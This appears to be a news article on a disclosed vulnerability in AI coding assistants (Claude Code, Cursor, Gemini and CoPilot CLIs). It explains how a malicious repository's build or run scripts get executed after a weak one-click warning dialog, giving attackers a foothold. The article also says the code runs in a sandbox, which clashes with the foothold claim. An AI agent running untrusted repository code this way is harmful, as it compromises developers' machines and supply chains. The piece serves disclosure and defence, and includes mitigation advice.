TrustFall Flaw Exposes Code Execution in Claude, Cursor, Gemini, CoPilot

Security researchers at the TrustFall convention have disclosed a critical vulnerability that allows malicious code repositories to trigger arbitrary code execution in several popular AI‑powered coding assistants. The flaw impacts Claude Code (Anthropic), Cursor CLI, Gemini CLI (Google) and CoPilot CLI (Microsoft/GitHub). By embedding a specially crafted payload in a repository, an attacker can cause the assistants to execute code with little or no user interaction, exploiting the tools’ default behavior of running retrieved scripts in a sandboxed environment.

The weakness lies in the way the assistants resolve and execute external scripts without sufficiently validating their origin or integrity. When a developer clones or pulls a repository, the assistant automatically scans for build or run scripts and presents a minimal warning dialog that can be bypassed or dismissed with a single click. Because the dialog does not display the script’s full path or request explicit confirmation, the malicious code runs silently, giving the attacker a foothold on the victim’s workstation.

The implications are severe for supply‑chain security. An adversary could publish a seemingly benign library or template that, once imported, automatically runs the hidden payload on any machine that uses the affected AI tools. This method circumvents traditional detection mechanisms that rely on user‑initiated execution, making it attractive for targeted attacks, espionage campaigns, or mass exploitation through public package registries.

Anthropic, Google, Microsoft and Cursor have been notified and are working on patches. In the meantime, users are advised to disable automatic script execution in their CLI settings, audit repository sources before cloning, and apply strict network policies to limit outbound connections from development environments. Organizations should also consider enabling code‑signing verification and monitoring for unusual process creation triggered by AI assistants.